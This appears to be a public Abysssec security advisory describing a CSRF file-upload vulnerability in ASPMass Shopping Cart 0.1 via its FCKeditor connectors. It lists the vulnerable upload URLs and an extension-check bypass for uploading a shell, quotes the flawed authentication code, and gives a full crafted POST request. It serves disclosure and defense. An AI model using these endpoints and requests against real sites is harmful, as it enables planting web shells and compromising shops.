''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-30-aspmass-shopping-cart-vulnerability-file-upload-csrf/ ''' Abysssec Inc Public Advisory Title : ASPMass Shopping Cart Vulnerability File Upload CSRF Affected Version : ASPMass Shopping Cart 0.1 Discovery : www.abysssec.com Vendor : http://www.aspmass.com/ Demo : http://www.aspmass.com/demo.htm Admin Page : http://Example.com/Admin/Login.aspx Description : =========================================================================================== This version of ASP Shopping Cart has CSRF vulnerability for upload a file with fckEditor. But we have two limitation : 1- We need Admin's Cookie 2- Specific file extension implementing by FckEditor v2 and bypassing this barrier is on you. For example the file with this extension shell.aspx;me.xml will be upload with this extension : shell_aspx;me.xml you can upload your file with this paths: (of course with CSRF) http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1280125833981&Type=File&CurrentFolder=/ http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/test.html http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html Uploaded files will be placing in this path: .../Files/site/file/ .../Files/site/flash/ .../Files/site/image/ .../Files/site/media/ vulnerable Code: The misconfiguration is in ...\Images\js\fcKeditor\editor\filemanager\connectors\aspx\config.ascx ln 40: private bool CheckAuthentication() { if (Session["AdminLogedIn"] == "Yes") { return true; } else { return false; } } For example you can feed this POST Request to Admin : ---------------------------------------------------------------------------------------- POST http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/ HTTP/1.1 Host: Example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html Cookie: ASP.NET_SessionId=ejskxhea4eqnkirsbxebj145 Content-Type: multipart/form-data; boundary=---------------------------92203111132182 Content-Length: 198 -----------------------------92203111132182 Content-Disposition: form-data; name="NewFile"; filename="Test.xml" Content-Type: text/plain This is a shell... -----------------------------92203111132182-- With this POST Request, the file Test.xml uploads i this path: .../Files/site/ The Source of HTML Page Malicious Link) =========================================================================================== With this page, we send a request with AJAX to upload a file with Admin's Cookie.